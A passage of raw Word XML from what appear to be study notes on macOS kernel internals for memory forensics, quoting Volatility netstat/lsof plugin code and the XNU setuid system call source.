        <w:t xml:space="preserve"> </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vnode </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_data</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"vnode"</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path </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vnode</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>full_path</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else</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>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path </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""</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p>
    <w:p w:rsidR="000C3756" w:rsidRPr="000C3756" w:rsidRDefault="000C3756" w:rsidP="000C3756">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> path</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRDefault="000C3756" w:rsidP="00AD72D9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRDefault="000C3756" w:rsidP="000A4450">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRDefault="000C3756" w:rsidP="000C3756">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc445313246"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Network connection</w:t>
      </w:r>
      <w:r w:rsidR="000A0651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="00AA6190" w:rsidRPr="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc.p_fd.fd_ofiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRPr="000A4450" w:rsidRDefault="003F5EBF" w:rsidP="000A4450">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\volatility-master\volatility\plugins\mac\netstat.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5EBF" w:rsidRPr="007279AA" w:rsidRDefault="003F5EBF" w:rsidP="003F5EBF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5EBF" w:rsidRPr="007279AA" w:rsidRDefault="003F5EBF" w:rsidP="003F5EBF">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for</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filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</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n</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lsof</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5EBF" w:rsidRPr="007279AA" w:rsidRDefault="003F5EBF" w:rsidP="003F5EBF">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f</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5EBF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_type</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color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5EBF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DTYPE_SOCKET</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5EBF" w:rsidRPr="007279AA" w:rsidRDefault="003F5EBF" w:rsidP="003F5EBF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               socket </w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filp</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fg_data</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"socket"</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007279AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000569DB" w:rsidRDefault="000569DB" w:rsidP="000569DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc445313247"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="000569DB" w:rsidRDefault="000569DB" w:rsidP="000569DB">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\kern\kern_prot.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000569DB" w:rsidRPr="00AA6190" w:rsidRDefault="000569DB" w:rsidP="000569DB">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pP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setuid</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Description: Set user ID system call</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Parameters:  uap-&gt;uid            uid to se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turns: 0               Success</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suser:EPERM             Permission denied</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Notes:   If called by a privileged process, this function will set th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al, effective, and saved uid to the requested valu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If called from an unprivileged process, but uid is equal to th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al or saved uid, then the effective uid will be set to th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quested value, but the real and saved uid will not chang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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> *      If the credential is changed as a result of this call, then w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flag the process as having set privilege since the last exec.</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in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set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roc_t p</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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> setuid_args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uap</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__unused int32_t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retval</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uid_t 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uid_t sv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UID_NONE</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uid_t r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UID_NONE</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uid_t gm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UID_NONE</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nt</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> error</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kauth_cred_t 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new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osix_cred_t my_p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a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my_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cred_proc_ref</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my_p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posix_cred_get</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DEBUG_CRED_ENTER</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"setuid (%d/%d): %p %d\n"</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p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p_pptr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pptr</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p_p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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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a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AUDIT_ARG</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f</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p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cr_ruid </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w: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allow setuid(getuid())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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        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p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cr_svuid </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w: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allow setuid(saved uid)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error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suser</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acflag</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kauth_cred_unref</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return</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error</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Everything's okay, do i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If we are priviledged, then set the saved and real UID too;</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otherwise, just set the effective UID</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f</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suser</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acflag</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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sv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r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Transfer proc count to new user.</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chgproccnt uses list lock for protection</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vo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chgproccnt</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vo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chgproccnt</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p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cr_r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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* get current credential and take a reference while we muck with it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for</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Only set the gmuid if the current cred has not opt'ed ou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this normally only happens when calling setgroups() instead</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of initgroups() to set an explicit group list, or one of th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other group manipulation functions is invoked and results in</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a dislocation (i.e. the credential group membership changes</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to something other than the default list for the user, as</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in entering a group or leaving an exclusion group).</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f</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p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cr_flags </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 xml:space="preserve"> CRF_NOMEMBER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gmui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Set the credential with new info.  If there is no chang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we get back the same credential we passed in; if there is</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a change, we drop the reference on the credential we</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passed in.  The subsequent compare is safe, because it is</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a pointer compare rather than a contents compare.</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my_new_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cred_setres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r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svu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gmui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f</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my_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new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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            DEBUG_CRED_CHANGE</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"setuid CH(%d): %p/0x%08x -&gt; %p/0x%08x\n"</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p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p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cr_flags</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new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posix_cred_get</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my_new_cred</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cr_flags</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roc_lock</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We need to protect for a race where another thread</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also changed the credential after we took our</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ference.  If p_ucred has changed then we should</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000569DB" w:rsidRPr="000569DB" w:rsidRDefault="000569DB" w:rsidP="000569DB">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000569DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             * restart this again with the new cred.</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i/>
          <w:iCs/>
